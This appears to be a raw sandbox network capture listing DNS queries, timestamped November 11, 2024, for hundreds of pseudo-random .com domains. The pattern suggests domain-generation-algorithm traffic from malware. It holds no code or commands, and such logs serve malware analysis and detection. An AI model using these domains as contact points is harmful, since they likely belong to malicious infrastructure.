                                                                                                                                                                                                                  Nov 11, 2024 18:50:46.481086016 CET192.168.2.61.1.1.10xba62Standard query (0)galyqoh.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                  Nov 11, 2024 18:50:46.486112118 CET192.168.2.61.1.1.10x31c5Standard query (0)qedyfyv.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                  Nov 11, 2024 18:50:46.486572981 CET192.168.2.61.1.1.10xee46Standard query (0)pumyxul.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                  Nov 11, 2024 18:50:46.487648010 CET192.168.2.61.1.1.10xbae2Standard query (0)lygygux.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                  Nov 11, 2024 18:50:46.496400118 CET192.168.2.61.1.1.10xd301Standard query (0)gadyfys.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                  Nov 11, 2024 18:50:46.496778965 CET192.168.2.61.1.1.10x7460Standard query (0)puzywag.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                  Nov 11, 2024 18:50:46.502948046 CET192.168.2.61.1.1.10x50d3Standard query (0)lymyxir.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                  Nov 11, 2024 18:50:46.504158974 CET192.168.2.61.1.1.10xe6f0Standard query (0)qeqyxil.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                  Nov 11, 2024 18:50:46.505795002 CET192.168.2.61.1.1.10xeaadStandard query (0)vofyguc.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                  Nov 11, 2024 18:50:46.505906105 CET192.168.2.61.1.1.10x1d68Standard query (0)vowycok.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                  Nov 11, 2024 18:50:46.506099939 CET192.168.2.61.1.1.10xcd5aStandard query (0)volyqam.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                  Nov 11, 2024 18:50:46.506375074 CET192.168.2.61.1.1.10x164cStandard query (0)lyxywen.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                  Nov 11, 2024 18:50:46.513251066 CET192.168.2.61.1.1.10x8f09Standard query (0)lykyjar.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                  Nov 11, 2024 18:50:46.513957977 CET192.168.2.61.1.1.10x5886Standard query (0)vocyryf.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                  Nov 11, 2024 18:50:46.521738052 CET192.168.2.61.1.1.10x836eStandard query (0)gatyveh.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                  Nov 11, 2024 18:50:46.531069994 CET192.168.2.61.1.1.10x83f1Standard query (0)qegyhip.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                  Nov 11, 2024 18:50:46.531518936 CET192.168.2.61.1.1.10x431aStandard query (0)qebytuv.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                  Nov 11, 2024 18:50:46.531826973 CET192.168.2.61.1.1.10xb52dStandard query (0)puvytuv.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                  Nov 11, 2024 18:50:46.532458067 CET192.168.2.61.1.1.10x1116Standard query (0)pujyjol.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                  Nov 11, 2024 18:50:46.532666922 CET192.168.2.61.1.1.10x7561Standard query (0)lyvytud.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                  Nov 11, 2024 18:50:46.532845974 CET192.168.2.61.1.1.10x7bc9Standard query (0)vojyjot.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                  Nov 11, 2024 18:50:46.533041954 CET192.168.2.61.1.1.10x338aStandard query (0)gahyhiz.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                  Nov 11, 2024 18:50:46.533164024 CET192.168.2.61.1.1.10x72e2Standard query (0)pufygup.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                  Nov 11, 2024 18:50:46.533200979 CET192.168.2.61.1.1.10x95dcStandard query (0)vopybym.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                  Nov 11, 2024 18:50:46.535475969 CET192.168.2.61.1.1.10x2dfbStandard query (0)qetyveq.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                  Nov 11, 2024 18:50:46.535737038 CET192.168.2.61.1.1.10x4caStandard query (0)lyryvaj.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                  Nov 11, 2024 18:50:46.545919895 CET192.168.2.61.1.1.10x5a45Standard query (0)purycaq.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                  Nov 11, 2024 18:50:46.552084923 CET192.168.2.61.1.1.10x1812Standard query (0)gacyryb.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                  Nov 11, 2024 18:50:46.562793970 CET192.168.2.61.1.1.10xea59Standard query (0)ganypis.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                  Nov 11, 2024 18:50:46.563054085 CET192.168.2.61.1.1.10xbd35Standard query (0)pupybyg.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                  Nov 11, 2024 18:50:46.563222885 CET192.168.2.61.1.1.10xe689Standard query (0)qekykal.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                  Nov 11, 2024 18:50:46.563894033 CET192.168.2.61.1.1.10x905cStandard query (0)lysynun.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                  Nov 11, 2024 18:50:46.565346003 CET192.168.2.61.1.1.10x3d4eStandard query (0)vonypic.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                  Nov 11, 2024 18:50:46.568643093 CET192.168.2.61.1.1.10x8a58Standard query (0)volykek.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                  Nov 11, 2024 18:50:46.570242882 CET192.168.2.61.1.1.10x36d9Standard query (0)qedynug.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                  Nov 11, 2024 18:50:46.581492901 CET192.168.2.61.1.1.10x9d1Standard query (0)galykew.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                  Nov 11, 2024 18:50:46.611032963 CET192.168.2.61.1.1.10x9ab3Standard query (0)lymysox.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                  Nov 11, 2024 18:50:46.611291885 CET192.168.2.61.1.1.10xe64eStandard query (0)pumypop.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                  Nov 11, 2024 18:50:46.611490011 CET192.168.2.61.1.1.10x7a8cStandard query (0)gadynub.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                  Nov 11, 2024 18:50:46.616173983 CET192.168.2.61.1.1.10x6756Standard query (0)puzylyq.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                  Nov 11, 2024 18:50:46.616493940 CET192.168.2.61.1.1.10xdb7aStandard query (0)gaqydaz.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                  Nov 11, 2024 18:50:46.616669893 CET192.168.2.61.1.1.10xc8faStandard query (0)pufymiv.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                  Nov 11, 2024 18:50:46.617037058 CET192.168.2.61.1.1.10xfe07Standard query (0)lyxylyj.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                  Nov 11, 2024 18:50:46.617790937 CET192.168.2.61.1.1.10x39baStandard query (0)vofymif.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                  Nov 11, 2024 18:50:46.618241072 CET192.168.2.61.1.1.10x5de9Standard query (0)vowydet.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                  Nov 11, 2024 18:50:46.618936062 CET192.168.2.61.1.1.10x693cStandard query (0)qeqysap.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                  Nov 11, 2024 18:50:46.619049072 CET192.168.2.61.1.1.10x3b1aStandard query (0)gacyzuh.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                  Nov 11, 2024 18:50:46.619122982 CET192.168.2.61.1.1.10xc504Standard query (0)qexyluq.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                  Nov 11, 2024 18:50:46.619259119 CET192.168.2.61.1.1.10x80e9Standard query (0)lygymod.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                  Nov 11, 2024 18:50:47.400434017 CET192.168.2.61.1.1.10xd880Standard query (0)vocykec.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                  Nov 11, 2024 18:50:47.400835991 CET192.168.2.61.1.1.10xd411Standard query (0)ganyzuz.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                  Nov 11, 2024 18:50:47.403865099 CET192.168.2.61.1.1.10x3268Standard query (0)puvylep.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                  Nov 11, 2024 18:50:47.413199902 CET192.168.2.61.1.1.10xbdStandard query (0)puryxuv.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                  Nov 11, 2024 18:50:47.416704893 CET192.168.2.61.1.1.10xf3fdStandard query (0)gacyqoz.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                  Nov 11, 2024 18:50:47.434925079 CET192.168.2.61.1.1.10xbca3Standard query (0)gahynuw.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                  Nov 11, 2024 18:50:47.435077906 CET192.168.2.61.1.1.10x61faStandard query (0)vonyzut.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                  Nov 11, 2024 18:50:47.435734034 CET192.168.2.61.1.1.10xdabdStandard query (0)qegyfeq.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                  Nov 11, 2024 18:50:47.437319040 CET192.168.2.61.1.1.10x7305Standard query (0)pupydev.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                  Nov 11, 2024 18:50:47.437546968 CET192.168.2.61.1.1.10xb707Standard query (0)qekyqoq.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                  Nov 11, 2024 18:50:47.443262100 CET192.168.2.61.1.1.10x63e7Standard query (0)puzyjov.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                  Nov 11, 2024 18:50:47.449141979 CET192.168.2.61.1.1.10xe7b9Standard query (0)lykymij.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                  Nov 11, 2024 18:50:47.451913118 CET192.168.2.61.1.1.10x7365Standard query (0)pumytyq.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                  Nov 11, 2024 18:50:47.456053019 CET192.168.2.61.1.1.10x90b3Standard query (0)gadydow.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                  Nov 11, 2024 18:50:47.456732988 CET192.168.2.61.1.1.10x8d49Standard query (0)vofydak.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                  Nov 11, 2024 18:50:47.458127975 CET192.168.2.61.1.1.10xa862Standard query (0)vowypim.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                  Nov 11, 2024 18:50:47.458564997 CET192.168.2.61.1.1.10xcc35Standard query (0)puzymup.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                  Nov 11, 2024 18:50:47.460107088 CET192.168.2.61.1.1.10xde1bStandard query (0)qeqylyg.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                  Nov 11, 2024 18:50:47.460827112 CET192.168.2.61.1.1.10xfb7cStandard query (0)gaqypuh.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                  Nov 11, 2024 18:50:47.469893932 CET192.168.2.61.1.1.10xee5dStandard query (0)gatycis.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                  Nov 11, 2024 18:50:47.470716000 CET192.168.2.61.1.1.10x158fStandard query (0)gaqyzyb.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                  Nov 11, 2024 18:50:47.471797943 CET192.168.2.61.1.1.10x8acfStandard query (0)vowyzuf.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                  Nov 11, 2024 18:50:47.471995115 CET192.168.2.61.1.1.10xb2e5Standard query (0)qekyhug.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                  Nov 11, 2024 18:50:47.472156048 CET192.168.2.61.1.1.10x50e6Standard query (0)volyjif.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                  Nov 11, 2024 18:50:47.472409964 CET192.168.2.61.1.1.10xe31eStandard query (0)vonyryk.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                  Nov 11, 2024 18:50:47.476733923 CET192.168.2.61.1.1.10x7b7eStandard query (0)qedyvap.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                  Nov 11, 2024 18:50:47.477016926 CET192.168.2.61.1.1.10x45aaStandard query (0)lysyvax.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                  Nov 11, 2024 18:50:47.477226019 CET192.168.2.61.1.1.10xe1dbStandard query (0)qegynul.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                  Nov 11, 2024 18:50:47.477245092 CET192.168.2.61.1.1.10x39aaStandard query (0)pupycop.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                  Nov 11, 2024 18:50:47.477442980 CET192.168.2.61.1.1.10xf184Standard query (0)qetyxiv.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                  Nov 11, 2024 18:50:47.477581978 CET192.168.2.61.1.1.10xc0a1Standard query (0)qexykav.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                  Nov 11, 2024 18:50:47.477641106 CET192.168.2.61.1.1.10xf84aStandard query (0)lymytuj.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                  Nov 11, 2024 18:50:47.477782965 CET192.168.2.61.1.1.10xcec7Standard query (0)lyxyjod.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                  Nov 11, 2024 18:50:47.477953911 CET192.168.2.61.1.1.10xd8e3Standard query (0)lygynyr.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                  Nov 11, 2024 18:50:47.478113890 CET192.168.2.61.1.1.10x72e7Standard query (0)pufydaq.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                  Nov 11, 2024 18:50:47.478399992 CET192.168.2.61.1.1.10xd28eStandard query (0)lygyfej.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                  Nov 11, 2024 18:50:47.495336056 CET192.168.2.61.1.1.10x1a8cStandard query (0)lyxymix.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                  Nov 11, 2024 18:50:47.495898962 CET192.168.2.61.1.1.10xb637Standard query (0)vocyqot.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                  Nov 11, 2024 18:50:47.496181965 CET192.168.2.61.1.1.10xe7efStandard query (0)gahyfyh.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                  Nov 11, 2024 18:50:47.496411085 CET192.168.2.61.1.1.10xddbdStandard query (0)vojygym.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                  Nov 11, 2024 18:50:47.496603966 CET192.168.2.61.1.1.10xcec1Standard query (0)lyvywar.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                  Nov 11, 2024 18:50:47.496630907 CET192.168.2.61.1.1.10xe53dStandard query (0)pujygug.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                  Nov 11, 2024 18:50:47.496788979 CET192.168.2.61.1.1.10xb691Standard query (0)gacykas.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                  Nov 11, 2024 18:50:47.496970892 CET192.168.2.61.1.1.10x203bStandard query (0)purypig.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                  Nov 11, 2024 18:50:47.497080088 CET192.168.2.61.1.1.10xcb36Standard query (0)galyhib.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                  Nov 11, 2024 18:50:47.497157097 CET192.168.2.61.1.1.10x20c5Standard query (0)qeqytuq.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                  Nov 11, 2024 18:50:47.497245073 CET192.168.2.61.1.1.10xa25bStandard query (0)lykygun.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                  Nov 11, 2024 18:50:47.497384071 CET192.168.2.61.1.1.10x73f0Standard query (0)vopycoc.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                  Nov 11, 2024 18:50:47.497607946 CET192.168.2.61.1.1.10x9193Standard query (0)puvywal.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                  Nov 11, 2024 18:50:47.497771025 CET192.168.2.61.1.1.10x9956Standard query (0)lyryxud.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                  Nov 11, 2024 18:50:47.497936964 CET192.168.2.61.1.1.10xc0bStandard query (0)qexyqip.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                  Nov 11, 2024 18:50:47.498084068 CET192.168.2.61.1.1.10xc616Standard query (0)lyvylyx.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                  Nov 11, 2024 18:50:47.498217106 CET192.168.2.61.1.1.10xa60cStandard query (0)pufybyl.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                  Nov 11, 2024 18:50:47.501128912 CET192.168.2.61.1.1.10xfc0aStandard query (0)qetysog.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                  Nov 11, 2024 18:50:47.501174927 CET192.168.2.61.1.1.10x2f15Standard query (0)vojymuk.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                  Nov 11, 2024 18:50:47.501405954 CET192.168.2.61.1.1.10x2befStandard query (0)qebyrel.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                  Nov 11, 2024 18:50:47.501431942 CET192.168.2.61.1.1.10x246dStandard query (0)vofybet.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                  Nov 11, 2024 18:50:47.501810074 CET192.168.2.61.1.1.10xeb67Standard query (0)gadyvez.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                  Nov 11, 2024 18:50:47.502006054 CET192.168.2.61.1.1.10x3ca2Standard query (0)gatydab.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                  Nov 11, 2024 18:50:47.502130985 CET192.168.2.61.1.1.10x226bStandard query (0)lyryson.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                  Nov 11, 2024 18:50:47.509587049 CET192.168.2.61.1.1.10x7eb2Standard query (0)pujymiq.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                  Nov 11, 2024 18:50:47.510622025 CET192.168.2.61.1.1.10x2f47Standard query (0)ganyrew.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                  Nov 11, 2024 18:50:47.510687113 CET192.168.2.61.1.1.10x9415Standard query (0)qebylyp.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                  Nov 11, 2024 18:50:47.518148899 CET192.168.2.61.1.1.10x3bbaStandard query (0)vopydaf.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                  Nov 11, 2024 18:50:47.833403111 CET192.168.2.61.1.1.10x96b3Standard query (0)lymylen.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                  Nov 11, 2024 18:50:47.834949017 CET192.168.2.61.1.1.10x4bc3Standard query (0)volymuc.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                  Nov 11, 2024 18:50:47.837419033 CET192.168.2.61.1.1.10x7df1Standard query (0)qedysol.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                  Nov 11, 2024 18:50:47.838953972 CET192.168.2.61.1.1.10x415cStandard query (0)pumyleg.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                  Nov 11, 2024 18:50:47.839664936 CET192.168.2.61.1.1.10x85aStandard query (0)galynus.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                  Nov 11, 2024 18:50:47.841047049 CET192.168.2.61.1.1.10xe2eeStandard query (0)lysysir.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                  Nov 11, 2024 18:50:47.841763020 CET192.168.2.61.1.1.10x8ff8Standard query (0)vonykam.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                  Nov 11, 2024 18:50:47.858962059 CET192.168.2.61.1.1.10x9cdbStandard query (0)pupypil.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                  Nov 11, 2024 18:50:47.859544992 CET192.168.2.61.1.1.10xf32Standard query (0)ganykah.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                  Nov 11, 2024 18:50:47.860491037 CET192.168.2.61.1.1.10xc5c1Standard query (0)qekynyv.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                  Nov 11, 2024 18:50:47.862391949 CET192.168.2.61.1.1.10xb641Standard query (0)vojybef.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                  Nov 11, 2024 18:50:47.865293026 CET192.168.2.61.1.1.10xd4dbStandard query (0)qegyvag.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                  Nov 11, 2024 18:50:47.865422964 CET192.168.2.61.1.1.10x927Standard query (0)pufycog.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                  Nov 11, 2024 18:50:47.868166924 CET192.168.2.61.1.1.10xa1eStandard query (0)lygyvon.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                  Nov 11, 2024 18:50:47.871754885 CET192.168.2.61.1.1.10xb8caStandard query (0)puvyjiq.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                  Nov 11, 2024 18:50:47.871882915 CET192.168.2.61.1.1.10x3288Standard query (0)vowyrec.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                  Nov 11, 2024 18:50:47.872580051 CET192.168.2.61.1.1.10x9123Standard query (0)gacyhuw.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                  Nov 11, 2024 18:50:47.882071972 CET192.168.2.61.1.1.10x15dbStandard query (0)qebykoq.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                  Nov 11, 2024 18:50:47.882488012 CET192.168.2.61.1.1.10xc3eeStandard query (0)vopyput.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                  Nov 11, 2024 18:50:47.882709026 CET192.168.2.61.1.1.10x2eb7Standard query (0)vocyjik.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                  Nov 11, 2024 18:50:47.883059025 CET192.168.2.61.1.1.10x7720Standard query (0)lyrytyx.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                  Nov 11, 2024 18:50:47.886920929 CET192.168.2.61.1.1.10x5d62Standard query (0)qetytup.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                  Nov 11, 2024 18:50:47.890497923 CET192.168.2.61.1.1.10xc535Standard query (0)gatypuz.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                  Nov 11, 2024 18:50:47.890862942 CET192.168.2.61.1.1.10x629cStandard query (0)gahyvab.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                  Nov 11, 2024 18:50:47.891947031 CET192.168.2.61.1.1.10x2a5bStandard query (0)pujybev.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                  Nov 11, 2024 18:50:47.896771908 CET192.168.2.61.1.1.10xc220Standard query (0)lyvyjoj.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                  Nov 11, 2024 18:50:47.897557974 CET192.168.2.61.1.1.10x6242Standard query (0)lykynyd.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                  Nov 11, 2024 18:50:47.897732973 CET192.168.2.61.1.1.10xa8bbStandard query (0)purytyp.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                  Nov 11, 2024 18:50:47.897948027 CET192.168.2.61.1.1.10x4e64Standard query (0)pufypuv.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                  Nov 11, 2024 18:50:47.912098885 CET192.168.2.61.1.1.10x51caStandard query (0)qexyhul.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                  Nov 11, 2024 18:50:47.914238930 CET192.168.2.61.1.1.10xf68Standard query (0)qedyxuq.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                  Nov 11, 2024 18:50:47.931298018 CET192.168.2.61.1.1.10x56edStandard query (0)gaqyres.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                  Nov 11, 2024 18:50:47.931823015 CET192.168.2.61.1.1.10xd990Standard query (0)qexynyq.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                  Nov 11, 2024 18:50:47.932066917 CET192.168.2.61.1.1.10xabe8Standard query (0)lyxygur.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                  Nov 11, 2024 18:50:47.932265997 CET192.168.2.61.1.1.10x73b1Standard query (0)qeqyrav.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                  Nov 11, 2024 18:50:47.932421923 CET192.168.2.61.1.1.10xd4d4Standard query (0)puzygyl.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                  Nov 11, 2024 18:50:47.933201075 CET192.168.2.61.1.1.10x94c0Standard query (0)vofycim.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                  Nov 11, 2024 18:50:47.933363914 CET192.168.2.61.1.1.10xe961Standard query (0)qebyqig.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                  Nov 11, 2024 18:50:47.943129063 CET192.168.2.61.1.1.10x2f9cStandard query (0)gadycih.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                  Nov 11, 2024 18:50:47.946074009 CET192.168.2.61.1.1.10xcd63Standard query (0)volygyt.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                  Nov 11, 2024 18:50:47.974224091 CET192.168.2.61.1.1.10x76fcStandard query (0)lymywad.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                  Nov 11, 2024 18:50:47.974505901 CET192.168.2.61.1.1.10x4acbStandard query (0)vojydoc.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                  Nov 11, 2024 18:50:47.975039959 CET192.168.2.61.1.1.10x1974Standard query (0)pumywov.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                  Nov 11, 2024 18:50:47.975203991 CET192.168.2.61.1.1.10x1e49Standard query (0)vonyqof.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                  Nov 11, 2024 18:50:47.975358963 CET192.168.2.61.1.1.10xb381Standard query (0)lysyxuj.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                  Nov 11, 2024 18:50:47.975522041 CET192.168.2.61.1.1.10xab56Standard query (0)pujydap.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                  Nov 11, 2024 18:50:47.975680113 CET192.168.2.61.1.1.10xdc9dStandard query (0)gacynyh.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                  Nov 11, 2024 18:50:47.975825071 CET192.168.2.61.1.1.10xb2d8Standard query (0)lygysid.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                  Nov 11, 2024 18:50:47.975960970 CET192.168.2.61.1.1.10xb99eStandard query (0)vocymum.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                  Nov 11, 2024 18:50:48.010023117 CET192.168.2.61.1.1.10x34aStandard query (0)lyvymun.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                  Nov 11, 2024 18:50:48.010121107 CET192.168.2.61.1.1.10x2fc0Standard query (0)lyryler.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                  Nov 11, 2024 18:50:48.010462046 CET192.168.2.61.1.1.10xfb4eStandard query (0)puvymug.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                  Nov 11, 2024 18:50:48.011061907 CET192.168.2.61.1.1.10x4f99Standard query (0)gatyzyw.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                  Nov 11, 2024 18:50:48.019773006 CET192.168.2.61.1.1.10x4c2aStandard query (0)qekyfep.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                  Nov 11, 2024 18:50:48.020262957 CET192.168.2.61.1.1.10xad74Standard query (0)galyfez.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                  Nov 11, 2024 18:50:48.020435095 CET192.168.2.61.1.1.10x7362Standard query (0)pupyxuq.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                  Nov 11, 2024 18:50:48.020596981 CET192.168.2.61.1.1.10xed72Standard query (0)ganyqib.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                  Nov 11, 2024 18:50:48.020755053 CET192.168.2.61.1.1.10x390cStandard query (0)vopyzyk.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                  Nov 11, 2024 18:50:48.021213055 CET192.168.2.61.1.1.10x520fStandard query (0)lykyfax.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                  Nov 11, 2024 18:50:48.022002935 CET192.168.2.61.1.1.10x396fStandard query (0)purylal.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                  Nov 11, 2024 18:50:48.022170067 CET192.168.2.61.1.1.10xb872Standard query (0)vowykat.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                  Nov 11, 2024 18:50:48.023617029 CET192.168.2.61.1.1.10xe1e8Standard query (0)qegysiv.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                  Nov 11, 2024 18:50:48.023899078 CET192.168.2.61.1.1.10xe500Standard query (0)gahydos.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                  Nov 11, 2024 18:50:48.024137020 CET192.168.2.61.1.1.10x3852Standard query (0)qetylel.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                  Nov 11, 2024 18:50:48.146271944 CET192.168.2.61.1.1.10x3b24Standard query (0)gaqyqiw.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                  Nov 11, 2024 18:50:48.160948038 CET192.168.2.61.1.1.10xbc64Standard query (0)lyxyfan.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                  Nov 11, 2024 18:50:48.161462069 CET192.168.2.61.1.1.10x978cStandard query (0)gatyrah.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                  Nov 11, 2024 18:50:48.173532963 CET192.168.2.61.1.1.10x6ddeStandard query (0)puzydog.comA (IP address)IN (0x0001)false
